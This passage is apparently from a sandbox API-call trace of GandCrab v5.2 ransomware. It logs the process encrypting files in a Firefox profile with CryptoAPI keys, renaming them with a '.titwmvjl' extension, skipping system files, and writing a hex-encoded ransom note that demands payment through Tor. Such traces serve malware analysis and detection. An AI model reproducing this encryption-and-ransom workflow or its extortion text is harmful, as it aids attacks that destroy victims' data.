ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.516] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.516] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.519] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.520] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.520] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.520] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.520] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.520] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.521] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.524] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.525] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.525] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.525] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.525] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.525] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.526] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.529] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0083.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.530] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.530] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.530] GetLastError () returned 0x0 [0083.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.530] CryptDestroyKey (hKey=0x503938) returned 1 [0083.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.531] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.531] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.535] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0083.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.535] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.535] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.535] GetLastError () returned 0x0 [0083.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.536] CryptDestroyKey (hKey=0x503578) returned 1 [0083.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.536] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.536] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.536] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.537] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x2cc9, lpOverlapped=0x0) returned 1 [0083.758] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffd337, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.758] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x2cc9, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x2cc9, lpOverlapped=0x0) returned 1 [0083.774] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.774] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.776] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.779] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.779] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.779] CloseHandle (hObject=0x2d4) returned 1 [0083.780] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\prefs.js"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\prefs.js.titwmvjl"), dwFlags=0x1) returned 1 [0083.781] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.781] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.781] lstrcmpW (lpString1="revocations.txt", lpString2=".") returned 1 [0083.781] lstrcmpW (lpString1="revocations.txt", lpString2="..") returned 1 [0083.781] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="revocations.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt" [0083.781] lstrlenW (lpString=".titwmvjl") returned 9 [0083.781] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0083.781] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.781] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt.titwmvjl") returned 104 [0083.781] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0083.781] lstrlenW (lpString=".txt") returned 4 [0083.781] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.781] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0083.781] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0083.781] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0083.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="desktop.ini") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="autorun.inf") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="ntuser.dat") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="iconcache.db") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="bootsect.bak") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="boot.ini") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="ntuser.dat.log") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="thumbs.db") returned -1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="CRAB-DECRYPT.html") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="ntldr") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="NTDETECT.COM") returned 1 [0083.782] lstrcmpiW (lpString1="revocations.txt", lpString2="Bootfont.bin") returned 1 [0083.782] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0083.782] lstrlenW (lpString=".txt") returned 4 [0083.782] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.782] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.782] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.782] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.783] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\revocations.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.783] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.783] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.784] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.784] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.787] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.787] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.787] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.787] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.788] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.788] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.788] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.790] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.791] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.791] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.791] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.791] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.791] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.791] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.791] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.794] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0083.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.794] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.795] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.795] GetLastError () returned 0x0 [0083.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.795] CryptDestroyKey (hKey=0x503938) returned 1 [0083.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.795] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.795] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.798] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0083.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.798] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.798] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.799] GetLastError () returned 0x0 [0083.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.799] CryptDestroyKey (hKey=0x503738) returned 1 [0083.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.799] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.799] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.799] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.799] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x53a6, lpOverlapped=0x0) returned 1 [0083.817] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffac5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.817] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x53a6, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x53a6, lpOverlapped=0x0) returned 1 [0083.819] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.820] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.824] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.824] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.824] CloseHandle (hObject=0x2d4) returned 1 [0083.825] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\revocations.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\revocations.txt.titwmvjl"), dwFlags=0x1) returned 1 [0083.825] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.826] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.826] lstrcmpW (lpString1="saved-telemetry-pings", lpString2=".") returned 1 [0083.826] lstrcmpW (lpString1="saved-telemetry-pings", lpString2="..") returned 1 [0083.826] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="saved-telemetry-pings" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings" [0083.826] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\" [0083.826] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0083.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.826] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.826] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.826] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.827] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.827] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.827] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.827] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\\\TITWMVJL-DECRYPT.txt") returned 123 [0083.827] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\saved-telemetry-pings\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0083.828] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d